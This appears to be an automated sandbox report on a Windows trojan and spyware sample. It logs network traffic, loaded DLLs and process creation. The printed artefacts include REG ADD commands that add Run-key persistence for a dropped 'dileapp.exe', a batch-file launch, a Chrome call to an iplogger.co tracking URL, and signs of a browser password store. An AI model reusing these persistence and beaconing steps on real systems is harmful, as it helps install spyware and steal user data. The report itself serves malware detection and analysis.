                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49770 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.156.217:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49778 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: dileapp.exe.0.drStatic PE information: section name:
                Source: dileapp.exe.0.drStatic PE information: section name: .idata
                Source: dileapp.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00797070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00797070
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A59840_2_007A5984
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007984090_2_00798409
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079E0450_2_0079E045
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A30E60_2_007A30E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE8D40_2_007BE8D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AE94A0_2_007AE94A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D1D20_2_0079D1D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AF25E0_2_007AF25E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079BA1A0_2_0079BA1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007932030_2_00793203
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AFAC80_2_007AFAC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B2B780_2_007B2B78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BA35E0_2_007BA35E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A2B3A0_2_007A2B3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A63F20_2_007A63F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DBE20_2_0079DBE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079EC970_2_0079EC97
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D5E40_2_0079D5E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A5DB90_2_007A5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A2DB50_2_007A2DB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AEE460_2_007AEE46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9EB00_2_007B9EB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AF6930_2_007AF693
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00795E960_2_00795E96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079276C0_2_0079276C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00793FC50_2_00793FC5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4FB50_2_007A4FB5
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007ACDF0 appears 37 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007AD870 appears 31 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007ACEC0 appears 53 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: dileapp.exe.0.drStatic PE information: Section: ZLIB complexity 0.9988467896757679
                Source: dileapp.exe.0.drStatic PE information: Section: fngpdisv ZLIB complexity 0.9945660806346209
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/5@9/6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A8BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_007A8BD0
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\NetstatJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                Source: C:\Users\user\Desktop\file.exeCommand line argument: *x~0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCommand line argument: *a}0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCommand line argument: 8y~0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_007AC131
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dileapp.exe, 0000000F.00000003.1984343715.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983801001.0000000005C6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 28%
                Source: dileapp.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: dileapp.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: dileapp.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: dileapp.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\dileapp.exe C:\Users\Public\Netstat\dileapp.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: unknownProcess created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: unknownProcess created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: unknownProcess created: C:\Users\Public\Netstat\dileapp.exe "C:\Users\Public\Netstat\dileapp.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\dileapp.exe C:\Users\Public\Netstat\dileapp.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: uxtheme.dllJump to behavior
